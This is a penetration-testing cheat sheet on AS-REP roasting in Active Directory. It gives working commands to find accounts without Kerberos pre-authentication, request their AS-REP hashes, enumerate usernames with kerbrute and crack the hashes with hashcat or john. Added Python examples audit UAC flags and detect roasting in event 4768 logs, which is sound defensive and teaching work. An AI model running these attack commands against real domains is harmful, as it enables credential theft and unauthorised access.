ASREPRoast

Tags
Kerberos, Unauthenticated, Initial Access

Identify

nxc ldap <IP> -u '' -p '' --query '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' ""
Remote
ADSearch.exe --search "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,samAccountName,userAccountControl
Local
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" -attr distinguishedName userAccountControl
Local, using dsquery (elevated context required)
Get-DomainUser -UACFilter DONT_REQ_PREAUTH | Select-Object samaccountname,useraccountcontrol
Local (PowerView)
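All of the queries above match the same bit in userAccountControl: DONT_REQ_PREAUTH (0x400000, decimal 4194304), tested with the LDAP bitwise-AND matching rule 1.2.840.113556.1.4.803. The following script is an added example, not part of the original cheat sheet, that decodes UAC values into flag names, builds that filter string, and reports which accounts in a constructed set of LDAP rows are actually exposed (pre-auth disabled and the account enabled). It is written from the audit side: it is the check a defender runs to find accounts that need the flag cleared.

```python
"""Audit userAccountControl (UAC) values for Kerberos pre-authentication
exposure. Added example; the LDAP rows below are constructed sample data,
not output from a real directory."""

# Selected UAC bit flags (values from the Microsoft UAC documentation).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",       # unrelated to pre-auth; often confused with the flag below
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",   # 4194304: Kerberos pre-authentication not required
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# LDAP extensible-match rule OID for bitwise AND on integer attributes.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

# Constructed sample rows shaped like (sAMAccountName, userAccountControl).
SAMPLE_ROWS = [
    ("svc-test", 0x0200 | 0x400000),           # enabled, pre-auth disabled -> exposed
    ("alice",    0x0200 | 0x0020),             # PASSWD_NOTREQD only -> not exposed
    ("old-svc",  0x0200 | 0x0002 | 0x400000),  # pre-auth disabled but account disabled
    ("bob",      0x0200 | 0x10000),            # ordinary account
]


def decode_uac(value):
    """Return the names of all known flags set in a UAC integer, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def ldap_filter_for_flag(bit):
    """Build the user filter that matches accounts with the given UAC bit set,
    in the same form as the queries on this page."""
    return ("(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={bit}))")


def find_asrep_exposed(rows):
    """Split accounts with DONT_REQ_PREAUTH into enabled (exposed now) and
    disabled (exposed the moment someone re-enables them)."""
    result = {"enabled": [], "disabled": []}
    for sam, uac in rows:
        if not uac & DONT_REQ_PREAUTH:
            continue
        bucket = "disabled" if uac & ACCOUNTDISABLE else "enabled"
        result[bucket].append(sam)
    return result


if __name__ == "__main__":
    print(ldap_filter_for_flag(DONT_REQ_PREAUTH))
    for sam, uac in SAMPLE_ROWS:
        print(f"{sam:10} {uac:>8} {decode_uac(uac)}")
    print(find_asrep_exposed(SAMPLE_ROWS))
```

The split between enabled and disabled accounts matters for remediation: a disabled account with the flag set produces no AS-REP today, but it is still a finding because re-enabling it silently reintroduces the exposure.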

Exploit

Request the AS-REP (the KDC answers the AS-REQ without pre-authentication, and the encrypted part of the reply is the crackable hash)

nxc ldap <IP> -u '<USER>' -p '' --asreproast output.txt
Remote
impacket-GetNPUsers domain.local/svc-test -no-pass
Remote
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt /user:svc-test /nowrap
Local
Get-ASREPHash -Username svc-test -verbose
Local - https://github.com/HarmJ0y/ASREPRoast
kerbrute userenum -d domain.local --dc <dcip> users.txt
Remote

Crack the AS-REP hash

hashcat -m 18200 --force -a 0 hashes.txt <wordlist>
john --wordlist=<wordlist> hashes.txt
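Every hash cracked above started as an AS-REQ that the KDC answered without pre-authentication. On the domain controller that leaves a Security event 4768 with Pre-Authentication Type 0 and, for a successful reply, Status 0x0; username guessing against the KDC (the kerbrute step) leaves 4768 failures with Status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN). The script below is an added example, not part of the original cheat sheet, that runs those two checks over constructed sample event lines in a flattened key=value form; a real pipeline would read the same fields from the 4768 EventData.

```python
"""Detect AS-REP roasting and Kerberos user enumeration in Windows Security
event 4768 records. Added example; the log lines are constructed, not captured."""
import re
from collections import Counter

# Constructed sample events (flattened key=value form of the 4768/4769 EventData).
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=svc-test PreAuthType=0 TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.5",
    "EventID=4768 TargetUserName=alice PreAuthType=2 TicketEncryptionType=0x12 Status=0x0 IpAddress=10.0.0.7",
    "EventID=4768 TargetUserName=bob PreAuthType=0 TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.5",
    "EventID=4768 TargetUserName=zz-nonexist PreAuthType=- TicketEncryptionType=0xFFFFFFFF Status=0x6 IpAddress=10.0.0.5",
    "EventID=4768 TargetUserName=yy-nonexist PreAuthType=- TicketEncryptionType=0xFFFFFFFF Status=0x6 IpAddress=10.0.0.5",
    "EventID=4769 TargetUserName=alice@DOMAIN.LOCAL ServiceName=cifs/fs01 TicketEncryptionType=0x12 Status=0x0 IpAddress=10.0.0.7",
]

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one flattened event line into a dict of its fields."""
    return dict(KV_RE.findall(line))


def is_asrep_roast(ev):
    """True for a successful AS-REQ answered without pre-authentication.
    PreAuthType 0 is the decisive field. TicketEncryptionType 0x17 (RC4) is
    the usual companion because the tools request it for faster cracking,
    but an AES reply (0x12) with PreAuthType 0 is still roastable, so the
    etype is reported rather than required."""
    return (ev.get("EventID") == "4768"
            and ev.get("PreAuthType") == "0"
            and ev.get("Status") == "0x0")


def find_asrep_roast_events(lines):
    """Return (user, source IP, etype) for each AS-REP issued without pre-auth."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_asrep_roast(ev):
            hits.append((ev["TargetUserName"], ev["IpAddress"],
                         ev.get("TicketEncryptionType")))
    return hits


def enumeration_sources(lines, threshold=2):
    """Source IPs with at least `threshold` 4768 failures for unknown
    principals (Status 0x6), the footprint of username guessing."""
    unknown = Counter()
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") == "4768" and ev.get("Status") == "0x6":
            unknown[ev["IpAddress"]] += 1
    return sorted(ip for ip, n in unknown.items() if n >= threshold)


if __name__ == "__main__":
    for user, ip, etype in find_asrep_roast_events(SAMPLE_EVENTS):
        print(f"AS-REP without pre-auth: user={user} src={ip} etype={etype}")
    for ip in enumeration_sources(SAMPLE_EVENTS):
        print(f"possible user enumeration from {ip}")
```

Legitimate clients that have the flag set on their account will also produce PreAuthType 0 events, so the useful alert is the pairing: a 4768 with PreAuthType 0 from a source that is not the account's normal host, or several such events for different accounts from one source in a short window.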